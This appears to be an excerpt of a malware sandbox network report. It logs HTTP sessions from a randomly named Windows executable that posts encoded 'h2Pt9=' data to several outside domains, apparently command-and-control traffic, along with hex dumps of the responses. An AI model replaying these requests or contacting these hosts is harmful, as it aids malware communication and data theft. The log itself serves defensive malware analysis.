                                  Data Ascii: :33px;height:33px;margin:0px auto !important;padding:0.3em !important;}.tve-m-trigger:not(.tve-triggered-icon) .tcb-icon-close{display:none;}.thrv_widget_menu.thrv_wrapper{padding:0px;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-swi
                                  Sep 16, 2024 09:32:19.493258953 CEST | 1236 | IN | Data Raw: 78 3b 74 6f 70 3a 30 70 78 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75
                                  Data Ascii: x;top:0px;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu li:not(#increase-spec):not(.ccls){padding:0px;width:100%;margin-top:0px;margin-bottom:0px;-webkit-tap-highlight-color:transparent;margin-left:0px !i
                                  Sep 16, 2024 09:32:19.493292093 CEST | 1236 | IN | Data Raw: 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 30 2c 32 35 30 2c 32 35 30 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 74 68 72 76 5f 77 69
                                  Data Ascii: "] ul.tve_w_menu li li{background-color:rgb(250,250,250);box-shadow:none;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="dark-tmp"] ul.tve_w_menu{background-color:rgb(30,30,31);}.thrv_widget_menu.thrv_wrapper[cla
                                  Sep 16, 2024 09:32:19.493325949 CEST | 1236 | IN | Data Raw: 6c 6f 63 6b 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 30 2e 33 73 20 65 61 73 65 20 30 73 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63
                                  Data Ascii: lock;transition:opacity 0.3s ease 0s;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger .tcb-icon-close{position:absolute;top:0px;left:50%;transform:translateX(-50%);opacity:0;}.thrv_widge
                                  Sep 16, 2024 09:32:19.493360043 CEST1236INData Raw: 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2c 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d
                                  Data Ascii: bkit-scrollbar,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-fullscreen ul.tve_w_menu::-webkit-scrollbar{width:14px;height:8px;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-m


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  30 | 192.168.2.4 | 55839 | 44.213.25.70 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:20.776063919 CEST | 806 | OUT | POST /72tr/ HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.newdaydawning.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.newdaydawning.net/72tr/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=db++YVdeF6Zd/r0d23czWDSMGLyb+S+eB9FGxyoccIsyuFYrJ3SwKMm3itVFWtXbepziAHgvZAo+XAln0uuGF5dpEgNZXeB+Xr1A7kZ1qlajquY5ZneXqLDoT1UlhznA+Wod9ovdSeKFRWv3OVijyL3/q03JzVe+XntAHUGYB4bvTM1TKbeykhhZWBntwd+Do0kBMmt38tMiagxIn/yovDI=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  31 | 192.168.2.4 | 55840 | 44.213.25.70 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:23.331491947 CEST | 10888 | OUT | POST /72tr/ HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.newdaydawning.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.newdaydawning.net/72tr/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:32:24.540472984 CEST | 489 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:23 GMT
                                  Server: Apache
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=UTF-8
                                  Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  32 | 192.168.2.4 | 55841 | 44.213.25.70 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:25.868325949 CEST | 515 | OUT | GET /72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk= HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:32:27.014731884 CEST | 477 | IN | HTTP/1.1 301 Moved Permanently
                                  Date: Mon, 16 Sep 2024 07:32:26 GMT
                                  Server: Apache
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  X-Redirect-By: WordPress
                                  Location: http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=UTF-8
                                  Sep 16, 2024 09:32:27.034292936 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  33 | 192.168.2.4 | 55842 | 3.33.130.190 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:40.161334038 CEST | 765 | OUT | POST /2mtz/ HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.o731lh.vip
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.o731lh.vip/2mtz/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=FdwSDo3o0U5Xt2pDBIDtfkutsL/s5ONuBajfJzFgRSKQ4qCNTxqUSdzehCnFM6xHFbGV9+GbeSO8x0JApCukOPIx9R9tJzxvJUji6v8jHUlp9VUDSDJuBHR3dGH2KoL8cdFlQMLAsPC2+aXT5CeaAoKhv7HIYUnjCgQLoK76mi47FrtNuW1SeQB0eaSKIwtkDg==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  34 | 192.168.2.4 | 55843 | 3.33.130.190 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:42.702240944 CEST | 785 | OUT | POST /2mtz/ HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.o731lh.vip
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.o731lh.vip/2mtz/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=FdwSDo3o0U5XuXZDAr7taEuigr/s2uMnBavfJ3UtQh+Q5LyNSyyUf9ze5SnERqxMFbCd98SbeSa8x15Aox2nOfI32x9jETxvJUji6v5EHU9p9EEDUm9xf3R2aGH2OoL4cdFLQO/qsM62+fTT5TeFKoKnhbG4Ul+NCTpGv7edthwIEt8X/nUFMQlHDdb+FzQtYl909pviWZ/e1ECZ7ZPtOqA=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  35 | 192.168.2.4 | 55844 | 3.33.130.190 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:45.251543999 CEST | 10867 | OUT | POST /2mtz/ HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.o731lh.vip
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.o731lh.vip/2mtz/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  36 | 192.168.2.4 | 55845 | 3.33.130.190 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:47.811455011 CEST | 508 | OUT | GET /2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:32:48.271414995 CEST | 396 | IN | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:32:48 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0="}</script></head></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  37 | 192.168.2.4 | 55846 | 54.81.206.248 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:53.551100969 CEST | 759 | OUT | POST /zl4r/ HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.wajf.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.wajf.net/zl4r/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=nCaTwuzfcT+1jQIAWbZLLddn29L26KocKDecVmdcv9nuDW2VUQreuuhtWFJJKE5/HtorNnJrJYfywUAbKkAReXSCGrAHUoDuONVmJmJ3yjgj3kFhKHg7exPOAAdCWmjKW3rU8CemWHPvhnwx5Du8GFmhEF8ykCy6aGsYDxxm7Hfx81e/kPDpfb5Lc1JkbKztyw==
                                  Sep 16, 2024 09:32:54.009495974 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:32:53 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:32:54.009944916 CEST1209INData Raw: 33 37 31 63 30 2d 31 31 2e 36 31 37 39 2c 36 2e 36 36 33 33 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35
                                  Data Ascii: 371c0-11.6179,6.66336-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  38 | 192.168.2.4 | 55847 | 54.81.206.248 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:56.095550060 CEST | 779 | OUT | POST /zl4r/ HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.wajf.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.wajf.net/zl4r/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 35 7a 51 41 61 63 4e 4c 61 74 64 6b 35 64 4c 32 7a 71 6f 59 4b 44 61 63 56 6e 6f 5a 76 76 54 75 44 33 47 56 56 52 72 65 69 4f 68 74 59 6c 4a 56 56 30 35 6b 48 74 73 46 4e 6c 64 72 4a 59 4c 79 77 51 45 62 4a 58 6f 53 65 48 53 45 66 37 41 46 51 6f 44 75 4f 4e 56 6d 4a 6c 30 2f 79 6a 34 6a 33 58 64 68 4b 6d 67 34 42 42 50 50 57 51 64 43 41 6d 6a 4f 57 33 72 4d 38 44 54 4a 57 43 44 76 68 6d 41 78 35 57 43 7a 4d 46 6e 71 4b 6c 39 57 74 48 72 64 61 45 52 62 65 41 46 63 34 47 48 41 77 54 50 6c 31 2b 69 2b 4e 62 64 34 42 79 41 51 57 4a 4f 6b 70 2b 30 38 6f 77 6a 59 63 49 6e 4a 57 7a 4d 63 30 70 72 31 59 36 67 3d
                                  Data Ascii: h2Pt9=nCaTwuzfcT+15zQAacNLatdk5dL2zqoYKDacVnoZvvTuD3GVVRreiOhtYlJVV05kHtsFNldrJYLywQEbJXoSeHSEf7AFQoDuONVmJl0/yj4j3XdhKmg4BBPPWQdCAmjOW3rM8DTJWCDvhmAx5WCzMFnqKl9WtHrdaERbeAFc4GHAwTPl1+i+Nbd4ByAQWJOkp+08owjYcInJWzMc0pr1Y6g=
                                  Sep 16, 2024 09:32:56.563927889 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:32:56 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:32:56.563945055 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                  Sep 16, 2024 09:32:56.563957930 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                  Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                  Sep 16, 2024 09:32:56.563968897 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                  Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                  Sep 16, 2024 09:32:56.563981056 CEST896INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                  Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                  Sep 16, 2024 09:32:56.563996077 CEST1236INData Raw: 35 36 36 2c 31 35 30 2e 31 30 30 36 36 5a 6d 35 33 2e 38 38 34 32 31 2c 30 41 31 32 31 2e 32 38 36 37 34 2c 31 32 31 2e 32 38 36 37 34 2c 30 2c 30 2c 31 2c 36 39 37 2e 38 32 33 2c 31 35 31 2e 32 31 34 33 63 2d 31 33 2e 37 38 39 36 34 2c 30 2d 32
                                  Data Ascii: 566,150.10066Zm53.88421,0A121.28674,121.28674,0,0,1,697.823,151.2143c-13.78964,0-22.00708-4.73786-22.00708-20.89646V60.11556c0-1.53118,1.25529-2.50721,2.78647-2.78646l12.95191-2.22931h.4172a2.74559,2.74559,0,0,1,2.37229,2.78646V71.538h19.64152
                                  Sep 16, 2024 09:32:56.564006090 CEST1236INData Raw: 2c 30 2c 30 2c 31 2c 34 37 35 2e 35 36 33 35 37 2c 34 39 2e 35 37 35 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 35 32 2e 32 36 2c 34 39 2e 35 37 35 76 35 2e 37 33 38 34 36 61 31 2e 33
                                  Data Ascii: ,0,0,1,475.56357,49.575Z" class="cls-2"></path><path d="M552.26,49.575v5.73846a1.30639,1.30639,0,0,1-1.31115,1.24352h-25.631a1.24975,1.24975,0,0,1-1.25192-1.24352V49.57666a1.25119,1.25119,0,0,1,1.24519-1.24688h25.63467A1.30971,1.30971,0,0,1,55
                                  Sep 16, 2024 09:32:56.564016104 CEST1236INData Raw: 2c 32 2e 37 38 39 35 31 48 32 2e 37 38 34 37 38 41 32 2e 37 39 34 35 36 2c 32 2e 37 39 34 35 36 2c 30 2c 30 2c 31 2c 30 2c 31 34 37 2e 33 31 31 31 35 56 35 32 2e 31 37 34 61 35 2e 35 38 38 31 39 2c 35 2e 35 38 38 31 39 2c 30 2c 30 2c 31 2c 35 2e
                                  Data Ascii: ,2.78951H2.78478A2.79456,2.79456,0,0,1,0,147.31115V52.174a5.58819,5.58819,0,0,1,5.56923-5.57091H20.61587c2.92407,0,4.45693.83641,6.12941,4.45726l32.4538,71.59518c.27926.69678.69645,1.11734,1.11533,1.11734.27925,0,.69813-.42056.69813-1.25529v-7
                                  Sep 16, 2024 09:32:56.564026117 CEST1236INData Raw: 32 36 31 39 2d 31 2e 31 31 35 33 32 2d 31 31 2e 32 38 33 31 32 2d 39 2e 31 39 33 31 2d 31 31 2e 32 38 33 31 32 68 2d 33 2e 33 34 33 63 2d 36 2e 34 30 38 36 36 2c 30 2d 39 2e 37 35 30 32 37 2c 31 2e 38 31 30 34 32 2d 39 2e 37 35 30 32 37 2c 31 31
                                  Data Ascii: 2619-1.11532-11.28312-9.1931-11.28312h-3.343c-6.40866,0-9.75027,1.81042-9.75027,11.28312v50.00529a2.80706,2.80706,0,0,1-2.64987,2.92778H172.60233a2.80415,2.80415,0,0,1-2.64482-2.92778V97.16759c0-17.55048,10.44672-26.60565,28.13818-26.60565h3.3
                                  Sep 16, 2024 09:32:56.564038038 CEST1236INData Raw: 38 2c 30 2c 30 2c 31 2c 31 2e 36 32 33 2c 31 2e 35 34 34 76 39 2e 31 38 30 33 33 41 31 2e 36 33 33 38 33 2c 31 2e 36 33 33 38 33 2c 30 2c 30 2c 31 2c 37 33 36 2e 34 38 35 32 36 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73
                                  Data Ascii: 8,0,0,1,1.623,1.544v9.18033A1.63383,1.63383,0,0,1,736.48526,150.10066Z" class="cls-1"></path><path d="M774.02347,149.69625a44.86749,44.86749,0,0,1-10.48137,1.0514c-10.55977,0-18.52751-6.49547-18.52751-19.73976v-7.557c0-13.24462,7.96774-19.7468
                                  Sep 16, 2024 09:32:56.564495087 CEST761INData Raw: 35 2e 35 32 36 35 2d 31 2e 39 35 31 37 31 2d 36 2e 35 38 31 32 37 2d 35 2e 36 38 34 33 2d 36 2e 35 38 31 32 37 68 2d 31 2e 39 35 31 34 63 2d 34 2e 37 31 35 2c 30 2d 35 2e 33 36 35 36 37 2c 32 2e 36 30 32 34 33 2d 35 2e 33 36 35 36 37 2c 36 2e 35
                                  Data Ascii: 5.5265-1.95171-6.58127-5.6843-6.58127h-1.9514c-4.715,0-5.36567,2.60243-5.36567,6.58127v29.16333a1.63291,1.63291,0,0,1-1.54094,1.71185h-7.71778a1.63357,1.63357,0,0,1-1.5443-1.71185V119.22548c0-3.97884-.65069-6.58127-5.362-6.58127h-1.9551c-3.732


